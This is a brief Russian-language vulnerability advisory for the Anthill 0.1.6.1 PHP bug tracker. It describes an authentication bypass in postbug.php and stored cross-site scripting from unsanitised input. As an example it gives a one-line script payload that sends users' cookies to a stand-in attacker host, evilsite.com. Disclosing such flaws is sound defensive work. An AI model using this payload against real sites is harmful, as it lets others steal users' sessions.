Anthill — система отслеживания ошибок (bug tracking) написанная
на PHP. 

1.Anthill содержит компонент postbug.php, который используется для обработки ошибок и добавления их в базу данных. При добавлении ошибки пользователи проходят аутентификацию в сценарии enterbug.php, который затем передает информацию для обработки к postbug.php. Поскольку
postbug не требует никакой идентификации, нападающий может передавать команды непосредственно к postbug.php (через URL или, создавая соответствующую форму на удаленном Web-сервере), таким образом
обходится механизм авторизации в enterbug.php.

2. Anthill не санирует пользовательский ввод, позволяя авторизованному
человеку вставлять произвольный HTML или JavaScript код при публикации ошибки. Этот код будет выполнен в браузерах других пользователей 
при просмотре  страницы с опубликованной
ошибкой. 

Поскольку Anthill использует cookies для подтверждения подлинности пользователей, уязвимость может использоваться для перехвата опознавательных мандатов других пользователей.

Пример:

<script>self.location.href=»http://www.evilsite.com/evil?»+escape(document
cookie)</script>

Уязвимость обнаружена в Anthill 0.1.6.1.



Оставить мнение